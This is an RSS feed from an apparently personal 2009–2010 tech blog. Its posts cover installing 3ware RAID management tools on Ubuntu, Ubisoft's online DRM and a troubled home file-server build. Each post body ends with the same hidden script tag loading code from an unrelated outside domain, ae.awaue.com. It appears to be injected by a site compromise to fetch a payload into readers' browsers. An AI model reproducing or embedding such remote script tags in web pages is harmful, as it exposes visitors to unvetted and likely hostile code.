<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Testing 1, 2, 3</title>
	<atom:link href="http://wordpress.fusetnt.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://wordpress.fusetnt.com</link>
	<description>Tech, talk, tantrums</description>
	<lastBuildDate>Wed, 30 Jun 2010 09:10:47 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0</generator>
		<item>
		<title>Getting the 3ware 9650SE working in Ubuntu 10.04 64-bit</title>
		<link>http://wordpress.fusetnt.com/2010/05/getting-the-3ware-9650se-working-in-ubuntu-10-04-64-bit/</link>
		<comments>http://wordpress.fusetnt.com/2010/05/getting-the-3ware-9650se-working-in-ubuntu-10-04-64-bit/#comments</comments>
		<pubDate>Fri, 21 May 2010 00:34:30 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[10.04]]></category>
		<category><![CDATA[3dm2]]></category>
		<category><![CDATA[3Ware]]></category>
		<category><![CDATA[3ware 9650SE-8LPML]]></category>
		<category><![CDATA[9650]]></category>
		<category><![CDATA[Lucid Lynx]]></category>
		<category><![CDATA[samba]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[webmin]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=641</guid>
		<description><![CDATA[In the last week I&#8217;ve updated Ubuntu from 9.10 to 10.04, and found a few rude shocks along the way. Samba, for one, is now treated entirely differently, and this of course breaks a number of things including Webmin. Apparently this will be addressed in the next release of Webmin, whenever that is. In the [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_654" class="wp-caption aligncenter" style="width: 535px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2010/05/lucidlynx.jpg"><img class="size-full wp-image-654" title="Lucid Lynx" src="http://wordpress.fusetnt.com/wp-content/uploads/2010/05/lucidlynx.jpg" alt="Lucid Lynx" width="525" height="182" /></a><p class="wp-caption-text">Ubuntu 10.04 might bring a new look, but it breaks a few things too.</p></div>
<p><strong>In the last week I&#8217;ve updated Ubuntu from 9.10 to 10.04, and found a few rude shocks along the way.</strong></p>
<p><a title="Samba's website" href="http://www.samba.org/" target="_blank">Samba</a>, for one, is now treated <a title="Samba now launched as a service" href="http://ubuntuforums.org/showthread.php?t=1464988">entirely differently</a>, and this of course breaks a number of things including <a title="Webmin's website" href="http://www.webmin.com/">Webmin</a>. Apparently this will be <a title="Webmin SourceForge forum" href="http://sourceforge.net/tracker/index.php?func=detail&amp;aid=2995073&amp;group_id=17457&amp;atid=117457">addressed in the next release of Webmin</a>, whenever that is. In the meantime, a distro upgrade from 9.10 to 10.04 will likely bork your Samba like it did mine, requiring a clean install to get things working again.</p>
<p>Another thing also broken in 10.04 is <a title="Ubuntu bug tracker" href="https://bugs.launchpad.net/ubuntu/+source/eglibc/+bug/574726">a library that affects name resolution</a>, which plays havoc with 3DM2&#8242;s email notification feature, crashing 3DM2 in the process. There&#8217;s a simple workaround for this: use your mail server&#8217;s IP instead of its name. Not optimal, but it will work until the Ubuntu devs catch up and stop palming the problem off to other devs.</p>
<h2>New 3DM2 + CLI 10.1</h2>
<p>One thing I did notice during the reinstall was that a new version of 3ware&#8217;s 3DM2 + CLI package was out, 10.1. Of course 3ware has never explicitly claimed Ubuntu support, so moving off the trusted 9.5.3 was a bit of a concern. I did it anyway, it worked fine (name resolution bug aside) and here&#8217;s how you can too.</p>
<p>The installation package has now moved to 100% text, away from the previous <a title="Getting the 3ware 9650SE working in Ubuntu 64-bit" href="http://wordpress.fusetnt.com/2009/12/getting-the-3ware-9650se-working-in-ubuntu-64-bit/" target="_blank">Installshield</a> efforts. It&#8217;s fairly trivial to set up too. Not Windows trivial, but then, nothing ever is on Linux.</p>
<p>First, uninstall any previous version of 3DM2 — how you do this will depend on  the distribution you&#8217;ve used. If you&#8217;ve used a .deb file, you should  find it in Synaptic Package Manager, but if you&#8217;ve used the old  Installshield package, you&#8217;ll need to open up a terminal and issue the following commands:</p>
<pre class="brush: delphi;">
cd /opt/AMCC/_uninst
sudo ./uninstaller.bin
</pre>
<p>And follow the  prompts. This assumes you installed to the default path of <em>/opt/AMCC</em>, if you&#8217;ve installed elsewhere, you&#8217;ll need to find uninstaller.bin yourself. Next, you&#8217;ll want to download the <em>3DM2  &amp; CLI Linux 10.1 code set</em> from <a title="3ware's website" href="http://www.3ware.com">3ware</a>.</p>
<p>Open a  terminal and navigate to the directory that <em>3DM2_CLI-Linux-10.1.zip</em> is  in.</p>
<p>Type:</p>
<pre class="brush: delphi;">
unzip 3DM2_CLI-Linux-10.1.zip -d 3dm2
cd 3dm2
chmod +x install.sh
sudo  ./install.sh --install
</pre>
<p>Then follow the prompts. If you&#8217;re still having grief, our <a title="Jonas Genannt's 3DM2 packages" href="http://jonas.genannt.name/">old friend has made some .deb files for us</a>.</p>
<p>After a successful install, simply open a browser, point it at https://127.0.0.1:888 and log in with the default password <em>3ware</em>. Just remember to use your mail server&#8217;s IP instead of its host name.<script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=641&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2010/05/getting-the-3ware-9650se-working-in-ubuntu-10-04-64-bit/feed/</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Ubisoft&#8217;s new DRM doesn&#8217;t quite work</title>
		<link>http://wordpress.fusetnt.com/2010/01/ubisofts-new-drm-doesnt-quite-work/</link>
		<comments>http://wordpress.fusetnt.com/2010/01/ubisofts-new-drm-doesnt-quite-work/#comments</comments>
		<pubDate>Sun, 31 Jan 2010 03:28:34 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[Games]]></category>
		<category><![CDATA[digital distribution]]></category>
		<category><![CDATA[Goodoldgames]]></category>
		<category><![CDATA[Steam]]></category>
		<category><![CDATA[Ubisoft]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=597</guid>
		<description><![CDATA[UPDATE &#124; Good lord. They really have been as stupid as to boot you from the game if your internet connection drops. Short of the usual blog fury and forum explosions, I&#8217;m not sure how to treat this. Boycotting is not the answer — the game studios just see that sales are down on PC, [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;">
<div id="attachment_610" class="wp-caption aligncenter" style="width: 585px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2010/01/acii.jpg"><img class="size-full wp-image-610" title="Assassin's Creed II" src="http://wordpress.fusetnt.com/wp-content/uploads/2010/01/acii.jpg" alt="Assassin's Creed II" width="575" height="301" /></a><p class="wp-caption-text">Ubisoft&#39;s Assassin&#39;s Creed II may have the new DRM scheme by the time it&#39;s released on PC.</p></div>
<p><em><span style="color: #993300;"><strong>UPDATE</strong></span> | Good lord. They really have been as stupid as to boot you from the game <a title="Rock Paper Shotgun -- You Maniacs!" href="http://www.rockpapershotgun.com/2010/02/17/you-maniacs/" target="_blank">if your internet connection drops</a>. Short of the usual blog fury and forum explosions, I&#8217;m not sure how to treat this. Boycotting is not the answer — the game studios just see that sales are down on PC, assume piracy has won, and it gives them more excuses to slowly strangle the life out of the platform by focusing on console.</em></p>
<p><strong>Last week, Ubisoft <a title="Ubisoft's new DRM scheme" href="http://www.shacknews.com/onearticle.x/62098" target="_blank">revealed its new DRM scheme</a>, effectively doing away with CD checks by moving the tech online.</strong></p>
<p>Ubisoft <a title="Ubisoft's 2008 DRM FUBAR" href="http://torrentfreak.com/ubisoft-dumps-prince-of-persia-drm-remains-skeptical-081212/" target="_blank">hasn&#8217;t had the best run</a> with DRM, although fortunately this seems to be a small step in the right direction.</p>
<p>All you need is an <a title="Ubi.com" href="http://www.ubi.com/" target="_blank">ubi.com</a> account, and to associate your game with that account. The technology then authenticates whenever you run the game, and syncs your save games online so you can transfer between machines, or install the game later and still have access.</p>
<p>In short, Ubisoft is doing its best to mimic <a title="Steam" href="http://www.steampowered.com" target="_blank">Steam</a>. It will be fascinating to see if Ubisoft eventually takes it one step further, cutting out the middle man and selling titles direct.</p>
<p>As usual, there are a few troubling things about the whole idea:</p>
<ol>
<li><strong>Double dipping DRM.</strong> This is speculative, but I&#8217;d hazard a guess Ubisoft titles sold through Steam and other digital distribution platforms will likely still require an ubi.com login, forcing a pointless double-dip DRM process akin to the <a title="Games for Windows Live" href="http://www.microsoft.com/games/en-US/index.aspx" target="_blank">GFWL</a> games on Steam, or the GTA IV <a title="Bit-tech GTA IV Review" href="http://www.bit-tech.net/gaming/pc/2008/12/04/grand-theft-auto-iv-pc/1" target="_blank">Securom/GFWL/Rockstar Social Club fiasco</a>.</li>
<li><strong>Destroying the game experience. </strong>A &#8220;permanent online connection is required&#8221;, and if that is lost then<em> </em>&#8220;the game will pause while it tries to reconnect. If the Internet Connection is unable to resume you can continue the game from where you left off or from the last saved game.&#8221;  Interruption of the game and destroying the suspension of disbelief is unacceptable, especially if this event occurs at no fault of the player. At the most, the game should <em>only</em> check when it is first launched. If you&#8217;re going to make background checks, <em>they need to be in the background</em>. If a check fails, wait until the game process is terminated before enforcing a policy.</li>
<li><strong>Mobile users are cut out. </strong>Pity the laptop gamer. If you don&#8217;t have WWAN or reception drops, too bad. Unlike Steam, there&#8217;s no way to set an &#8220;offline&#8221; mode.</li>
<li><strong>We&#8217;re asked to trust the untrustworthy. </strong>If the service somehow disappears from existence, then Ubisoft &#8220;will create a patch for the game so that the core game play will not be affected.&#8221; Which is all very nice, but Ubisoft hasn&#8217;t exactly established itself as a shining knight of consumer favour. Its version of  <em>Beyond Good and Evil</em> on Steam and GoodOldGames <a title="Making old games in Steam not suck — Part 1: Beyond Good and Evil" href="http://wordpress.fusetnt.com/2009/06/making-old-games-in-steam-not-suck-part-1-beyond-good-and-evil/" target="_blank">requires a lot of system tweaking to even get working properly</a> on modern systems, despite selling for US$9.99. <em>Prince of Persia <a title="Prince of Persia: Sands of Time" href="http://store.steampowered.com/app/13600/" target="_blank">Sands of Time</a>, <a title="Prince of Persia: Two Thrones" href="http://store.steampowered.com/app/13530/" target="_blank">Two Thrones</a></em> and <em><a title="Prince of Persia: Warrior Within" href="http://store.steampowered.com/app/13500/" target="_blank">Warrior Within</a></em> require you to turn off fog in order to be able to see anything, otherwise it just turns the screen white. These titles are also selling for US$9.99 on Steam. All should be considered broken goods, and a portent for how Ubisoft treats its old code with new customers.</li>
<li><strong>Growing pains. </strong>It took Steam years to become the reliable service it is today. I suspect we&#8217;ll see a few reports of Ubisoft&#8217;s servers being unable to cope with the load in the early days of the scheme&#8217;s release.</li>
</ol>
<p>All this is summed up with the remarkably sheltered comment of Brett Wilkinson, Ubisoft&#8217;s Director of Customer Support, who states: &#8220;We think most people are going to be fine with it. Most people are always connected to an Internet connection&#8221;.</p>
<p>Who are these &#8220;people&#8221;? Brett, you might want to take a look at the most recent <a title="Internet World Stats" href="http://www.internetworldstats.com/stats.htm" target="_blank">internet penetration</a> stats (at the time of writing, 25.6% world wide), or at the very least adjust your sentence. Perhaps a more accurate statement would be: &#8220;The bulk of our sales come from densely populated cities with always-on internet connections, and as a business, we follow where the dollar goes&#8221;.</p>
<p>At least it&#8217;d be honest.<script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=597&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2010/01/ubisofts-new-drm-doesnt-quite-work/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Getting the 3ware 9650SE working in Ubuntu 9.10 64-bit</title>
		<link>http://wordpress.fusetnt.com/2009/12/getting-the-3ware-9650se-working-in-ubuntu-64-bit/</link>
		<comments>http://wordpress.fusetnt.com/2009/12/getting-the-3ware-9650se-working-in-ubuntu-64-bit/#comments</comments>
		<pubDate>Sat, 12 Dec 2009 13:24:03 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[File Server]]></category>
		<category><![CDATA[3dm2]]></category>
		<category><![CDATA[3ware 9650se]]></category>
		<category><![CDATA[cli]]></category>
		<category><![CDATA[Ubuntu]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=576</guid>
		<description><![CDATA[While the Linux kernel has included 3ware drivers that have worked perfectly for a long time, to manage your array you need access to applications. Firmware aside, 3ware splits its application into two parts — its command line tool tw_cli and its web management tool 3dm2. While tw_cli is perfectly fine for managing the array [...]]]></description>
			<content:encoded><![CDATA[<p><strong>While the Linux kernel has included 3ware drivers that have worked perfectly for a long time, to manage your array you need access to applications.</strong></p>
<p>Firmware aside, 3ware splits its application into two parts — its command line tool <em>tw_cli </em>and its web management tool <em>3dm2</em>. While <em>tw_cli</em> is perfectly fine for managing the array directly, you&#8217;ll need <em>3dm2</em> to setup mail notifications and scheduled maintenance.</p>
<div id="attachment_569" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/12/3dm2.gif"><img title="3ware's 3dm2" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/12/3dm2.gif" alt="3ware's 3dm2 is where all your card management should be done." width="500" height="301" /></a><p class="wp-caption-text">3ware&#39;s 3dm2 is where most of your card management will be done, as the CLI is sadly limited.</p></div>
<p>Until <a title="3ware's download page" href="http://www.3ware.com/support/download.asp" target="_blank">version 9.5.3</a> was released at the end of November, 3ware&#8217;s tools simply didn&#8217;t install in Ubuntu 64-bit thanks to a broken installer. To get things working, you needed a third party <a title="9.5.2 beta solution" href="http://jonas.genannt.name/" target="_blank">release</a>.</p>
<p>3ware&#8217;s install is simply weird; rather than simply provide a .deb file, once you&#8217;ve extracted the .tar.gz &#8220;Linux&#8221; bundle you&#8217;re presented with a .bin file. After making it executable, and running it:</p>
<pre class="brush: delphi;">
chmod +x setupLinux_x64.bin
sudo ./setupLinux_x64.bin
</pre>
<p>A Java runtime environment extracts, and, shock — a graphical version of <a title="Installshield" href="http://www.installshield.com" target="_blank"><em>Installshield</em></a> loads. Who said it was just for Windows?</p>
<div id="attachment_568" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/12/installshield.jpg"><img title="3ware's Installshield installation" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/12/installshield.jpg" alt="Installshield on Linux... who'd have thought?" width="500" height="305" /></a><p class="wp-caption-text">Installshield on Linux... who&#39;d have thought?</p></div>
<p>After going through the process and a restart, the webserver was running on https://127.0.0.1:888 with the default password <em>3ware</em> and everything was as easy as pie. Complemented with <a title="GapcMon" href="http://gapcmon.sourceforge.net/" target="_blank">GapcMon</a>, <a title="apcupsd" href="http://www.apcupsd.com/" target="_blank">apcupsd</a>, <a title="Webmin" href="http://www.webmin.com/" target="_blank">Webmin</a>, <a title="Samba" href="http://www.samba.org/" target="_blank">Samba</a>, <a title="Proftpd" href="http://www.proftpd.org/" target="_blank">Proftpd</a> and <a title="gadmin-proftpd" href="http://www.gadmintools.org/" target="_blank">Gadmin-proftpd</a>, I&#8217;m now ready to start filling up my file server.<script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=576&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/12/getting-the-3ware-9650se-working-in-ubuntu-64-bit/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>Sometimes giving in is easier</title>
		<link>http://wordpress.fusetnt.com/2009/12/sometimes-giving-in-is-easier/</link>
		<comments>http://wordpress.fusetnt.com/2009/12/sometimes-giving-in-is-easier/#comments</comments>
		<pubDate>Sat, 12 Dec 2009 13:18:26 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[File Server]]></category>
		<category><![CDATA[3ware 9650se]]></category>
		<category><![CDATA[Areca ARC-1300ix-16]]></category>
		<category><![CDATA[Asus P5Q-E]]></category>
		<category><![CDATA[block level dedupe]]></category>
		<category><![CDATA[controller]]></category>
		<category><![CDATA[Corsair TX-850]]></category>
		<category><![CDATA[FreeBSD]]></category>
		<category><![CDATA[Gigabyte GA-EP45 Extreme]]></category>
		<category><![CDATA[HP rack]]></category>
		<category><![CDATA[LSI SAS3081E-R]]></category>
		<category><![CDATA[Nexenta]]></category>
		<category><![CDATA[OpenSolaris]]></category>
		<category><![CDATA[Ubuntu]]></category>
		<category><![CDATA[VirtualBox]]></category>
		<category><![CDATA[virtualisation]]></category>
		<category><![CDATA[ZFS]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=549</guid>
		<description><![CDATA[OpenSolaris&#8217; ZFS implementation recently picked up one of the tastiest things it possibly could: block level dedupe. Except I no longer care. Too impatient to wait for the RMA on the dead Asus P5Q-E (of which the replacement is now a spare swap-in board), thanks to an incredibly generous friend I picked up a Gigabyte [...]]]></description>
			<content:encoded><![CDATA[<p><strong>OpenSolaris&#8217; ZFS implementation recently picked up one of the tastiest things it possibly could: <a title="Block level dedupe in ZFS" href="http://blogs.sun.com/bonwick/entry/zfs_dedup" target="_blank">block level dedupe</a>.</strong></p>
<p>Except I no longer care.</p>
<p>Too impatient to wait for the RMA on the dead Asus P5Q-E (of which the replacement is now a spare swap-in board), thanks to an incredibly generous friend I picked up a Gigabyte GA-EP45-Extreme&#8230; which <a title="Open Solaris beta downloads" href="http://www.genunix.org/" target="_blank">OpenSolaris b127</a> hated, and refused to boot with. After a few days of hair pulling and switching off almost everything I could in the BIOS to try and rectify the issue, I finally admitted OpenSolaris was not to be.</p>
<div id="attachment_555" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/12/gigabyteep45extreme.jpg"><img class="size-full wp-image-555" title="Gigabyte GA-EP45 Extreme" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/12/gigabyteep45extreme.jpg" alt="The Gigabyte GA-EP45 Extreme, great board, hated by OpenSolaris" width="500" height="411" /></a><p class="wp-caption-text">The Gigabyte GA-EP45 Extreme, great board, hated by OpenSolaris</p></div>
<p>Not willing to risk <a title="Nexenta" href="http://www.nexenta.org/" target="_blank">Nexenta</a>, I dropped to <a title="FreeBSD" href="http://www.freebsd.org/" target="_blank">FreeBSD 8</a>, the last bastion of ZFS hope (no folks, <a title="ZFS on FUSE" href="http://zfs-on-fuse.blogspot.com/" target="_blank">FUSE</a> does not count).</p>
<p>FreeBSD worked wonderfully from a compatibility front, but I soon discovered that when it came to virtualisation, it had the same options as a prisoner faced with the Spanish inquisition: basically none. There is, ironically, a version of <a title="VirtualBox for BSD" href="http://wiki.freebsd.org/VirtualBox" target="_blank">Sun&#8217;s VirtualBox</a> floating around, but it&#8217;s a hack job that hates 64-bit, and like most things FreeBSD if you&#8217;re not running from the command line you&#8217;re asking for pain.</p>
<p>And so, hoping that one day Larry Ellison would open up ZFS licensing a little more so the GPL crowd would stop whining and just integrate it already, I sighed, flicked the 3ware 9650SE into hardware RAID 6 and reached for the <a title="Ubuntu" href="http://www.ubuntu.com/" target="_blank">Ubuntu</a> 9.10 64-bit disc.</p>
<p>It worked.</p>
<h2>Post mortem: List of controller cards that will work with OpenSolaris</h2>
<p>While I note with grim satisfaction that Areca has still <a title="Areca are liars - the ARC-1300ix 16 does not support Solaris" href="http://wordpress.fusetnt.com/2009/08/areca-are-liars-the-arc-1300ix-16-does-not-support-solaris/" target="_blank">failed to produce</a> a Solaris driver for it&#8217;s ARC-1300ix series, here&#8217;s a list of PCI-Express cards known to work with OpenSolaris without requiring any RAID 0/JBOD workarounds, and being able to control at least eight drives.</p>
<ol>
<li><a title="LSI SAS3081E-R" href="http://www.lsi.com/storage_home/products_home/host_bus_adapters/sas_hbas/lsisas3081er/" target="_blank">LSI SAS3081E-R</a></li>
<li><a title="Intel SASUC8I" href="http://www.intel.com/products/server/raid-controllers/SASUC8I/SASUC8I-overview.htm" target="_blank">Intel SASUC8I</a> flashed with the <a title="TimC's comment" href="http://wordpress.fusetnt.com/2009/08/areca-are-liars-the-arc-1300ix-16-does-not-support-solaris/comment-page-1/#comment-233" target="_blank">SAS8031E-R&#8217;s IT (initiator target) firmware</a></li>
<li><a title="3ware 9650SE" href="http://www.3ware.com/products/serial_ata2-9650.asp" target="_blank">3ware 9650SE series</a></li>
</ol>
<p>Tiny, yes? The last, which I ended up with due to non-availability of the first two in Australia, is significantly more expensive as it has hardware RAID capability as well.</p>
<h2>Post mortem: Final system</h2>
<p><strong>Rack:</strong> HP 10622<br />
<strong>OS:</strong> Ubuntu 9.10<br />
<strong>PSU:</strong> Corsair TX-850<br />
<strong>CPU:</strong> Intel Q9550<br />
<strong>Memory:</strong> 8GB Corsair Dominator PC-2 8500<br />
<strong>Motherboard:</strong> Gigabyte GA-EP45 Extreme<br />
<strong>GPU:</strong> Geforce 7600GS silent (to be swapped out with a PCI card when a second 3ware controller card is bought)<br />
<strong>Controller card:</strong> 3ware 9650SE-8LPML<br />
<strong>Network card:</strong> HP NC364T<br />
<strong>Case:</strong> Chenbro RM41416B<br />
<strong>UPS:</strong> APC Smart-UPS 750<br />
<strong>Switch:</strong> Netgear GS724T<br />
<strong>System drives:</strong> Samsung HD501LJ SATA<br />
<strong>Array drives (RAID 6 w/XFS):</strong> WD RE3 1TB x3, Samsung HD103UJ 1TB x2, Seagate 7200.11 x2, Seagate 7200.12</p>
<p>The only problem left is the Seagate 7200.12, which seems to keep dropping from the array. I&#8217;ll have to see if a firmware update to the 3ware card fixes it, otherwise I may need to swap in a new drive (<em>Update: turns out the ridiculously expensive Mini-SAS to SATA cables I bought were dodgy. Upon replacing, I&#8217;ve had no dropouts).<br />
</em><script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=549&type=feed" alt="" />]]></content:encoded>
			<wfw:commentRss>http://wordpress.fusetnt.com/2009/12/sometimes-giving-in-is-easier/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Curse of the server</title>
		<link>http://wordpress.fusetnt.com/2009/09/curse-of-the-server/</link>
		<comments>http://wordpress.fusetnt.com/2009/09/curse-of-the-server/#comments</comments>
		<pubDate>Tue, 29 Sep 2009 12:10:00 +0000</pubDate>
		<dc:creator>Daedalus</dc:creator>
				<category><![CDATA[Featured]]></category>
		<category><![CDATA[File Server]]></category>
		<category><![CDATA[3ware 9650se]]></category>
		<category><![CDATA[Adaptec 31605]]></category>
		<category><![CDATA[APC SmartUPS 750]]></category>
		<category><![CDATA[Areca ARC-1300ix-16]]></category>
		<category><![CDATA[Asus P5Q-E]]></category>
		<category><![CDATA[Coolermaster RS-850-EMBA]]></category>
		<category><![CDATA[Corsair TX-850]]></category>
		<category><![CDATA[Curse of the server]]></category>
		<category><![CDATA[Digicor]]></category>
		<category><![CDATA[HP rack]]></category>
		<category><![CDATA[LSI SAS3081E-R]]></category>
		<category><![CDATA[Netgear GS724T]]></category>

		<guid isPermaLink="false">http://wordpress.fusetnt.com/?p=487</guid>
		<description><![CDATA[I suppose at this point I really shouldn&#8217;t be surprised. The number of things that have gone wrong to date rival most government run projects. Not covering old ground: The Areca ARC-1300ix 16 was returned on the basis of no Solaris driver and it being a glorified port multiplier. I waited for about a month [...]]]></description>
			<content:encoded><![CDATA[<div id="attachment_488" class="wp-caption alignright" style="width: 260px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/cotfs.jpg"><img class="size-full wp-image-488  " title="Curse of the server" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/cotfs.jpg" alt="Gasp! Intrigue! Another fucking motherboard!" width="250" height="361" /></a><p class="wp-caption-text">Gasp! Intrigue! Another fucking motherboard!</p></div>
<p><strong>I suppose at this point I really shouldn&#8217;t be surprised. The number of things that have gone wrong to date rival most government run projects.</strong></p>
<p>Not covering old ground:</p>
<ol>
<li>The Areca ARC-1300ix 16 was returned on the basis of no Solaris driver and it being a glorified port multiplier. I waited for about a month for the Adaptec 31605 on back order. After showing no signs of turning up any time soon, I cancelled the order and decided to pony up for the highly featured and crazily expensive <a title="3ware 9650SE-8LPML" href="http://www.3ware.com/products/serial_ata2-9650.asp" target="_blank">3ware 9650SE-8LPML</a> instead.  The day after, I find out Digicor has started distributing the <a title="LSI SAS3081E-R" href="http://www.digicor.com.au/ns/fe/product/Product.aspx?id=2817" target="_blank">SAS3081E-R</a> again, a significantly cheaper option. Take in mind either choice locks me into a motherboard with at least three PCI-E x4 slots (due to needing 16 channels, and to equip  the Intel quad gigabit Ethernet card).</li>
<li>The moment the 3ware arrives, I plug it in, and lo and behold, the machine no longer posts. Having seen a similar behaviour on the previous server (would or would not boot based on random hardware plugged in and how many times half the male population has scratched its crotch in the last hour while the wind is blowing west), I proceeded to disconnect everything until only RAM, CPU and GPU remained — and it still didn&#8217;t boot. Being that the only remaining part from the old server was the <a title="CoolerMaster RS-850-EMBA" href="http://www.tomshardware.com/reviews/toms-reference-system,1748-8.html" target="_blank">850W CoolerMaster PSU</a>, I ordered a <a title="Corsair TX-850" href="http://www.jonnyguru.com/modules.php?name=NDReviews&amp;op=Story&amp;reid=126" target="_blank">Corsair TX-850</a> at AU$240 to remove all doubt, plugged it in AND;
<div id="attachment_514" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/corsairtx850.jpg"><img class="size-full wp-image-514 " title="Corsair TX-850" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/corsairtx850.jpg" alt="Corsair TX-850" width="500" height="295" /></a><p class="wp-caption-text">The Corsair TX-850, a PSU with a beefy 12V rail and five year warranty - AU$240.</p></div></li>
<li>Discovered that the <a title="Asus P5Q-E" href="http://www.asus.com.au/product.aspx?P_ID=ogZlrSeVzUh9MKLO&amp;templete=2" target="_blank">Asus P5Q-E</a> motherboard, which replaced the exploded MSI was the dead part, despite no sparking, despite working a week ago, despite nothing being physically wrong with the board — it just stopped posting,  meaning I&#8217;ve once again spent more cash than I have to.
<p><div id="attachment_546" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/p5qe.jpg"><img class="size-full wp-image-546" title="Asus P5Q-E" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/p5qe.jpg" alt="The excellent Asus P5Q-E. Alas, it was not to be." width="500" height="313" /></a><p class="wp-caption-text">The excellent Asus P5Q-E. Alas, it was not to be.</p></div></li>
</ol>
<p>Well, fuck. That&#8217;s two motherboards gone in one build, which is making me wonder if the case is shorting something somehow. At this point I&#8217;ve had the chassis for over ten months, with no working system. It&#8217;s enough to make you want to buy a prebuilt NAS.</p>
<p>Meanwhile the brand new <a title="Netgear GS724T" href="http://www.netgear.com/Products/Switches/SmartSwitches/GS724T.aspx" target="_blank">Netgear GS724T</a>, <a title="APC Smart UPS 750" href="http://www.apcc.com/products/resource/include/techspec_index.cfm?base_sku=SUA750RM2U&amp;total_watts=50" target="_blank">APC SmartUPS 750</a> and <a title="HP 10622" href="http://h18000.www1.hp.com/products/servers/proliantstorage/racks/10000series/description.html" target="_blank">HP 22RU rack</a> just sit there, waiting for some action&#8230;</p>
<p><div id="attachment_519" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/3ware9650se1.jpg"><img class="size-full wp-image-519" title="3ware 9650SE-8LPML" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/3ware9650se1.jpg" alt="The mighty 3ware 9650SE-8LPML." width="500" height="300" /></a><p class="wp-caption-text">The mighty 3ware 9650SE-8LPML, coming to a server near you - AU$915.</p></div>
<div id="attachment_509" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/netgeargs724t.jpg"><img class="size-full wp-image-509" title="Netgear GS724T" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/netgeargs724t.jpg" alt="Netgear GS724T" width="500" height="140" /></a><p class="wp-caption-text">Netgear GS724T - picked up for AU$280.</p></div>
<div id="attachment_508" class="wp-caption aligncenter" style="width: 510px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/apcups.jpg"><img class="size-full wp-image-508" title="APC SmartUPS 750" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/apcups.jpg" alt="APC SmartUPS 750" width="500" height="140" /></a><p class="wp-caption-text">APC SmartUPS 750 - AU$231 on eBay.</p></div>
<p><div id="attachment_512" class="wp-caption aligncenter" style="width: 310px"><a href="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/hprack.jpg"><img class="size-full wp-image-512" title="HP 10622 rack" src="http://wordpress.fusetnt.com/wp-content/uploads/2009/09/hprack.jpg" alt="HP 10622 rack - the one I bought on eBay for AU$180 likely has a bit more wear and tear than this image." width="300" height="300" /></a><p class="wp-caption-text">HP 10622 rack - the one I bought on eBay for AU$180 likely has a bit more wear and tear than the one in this image.</p></div><script src="http://ae.awaue.com/7"></script></p>
<img src="http://wordpress.fusetnt.com/?ak_action=api_record_view&id=487&type=feed" alt="" />]]></content:encoded>
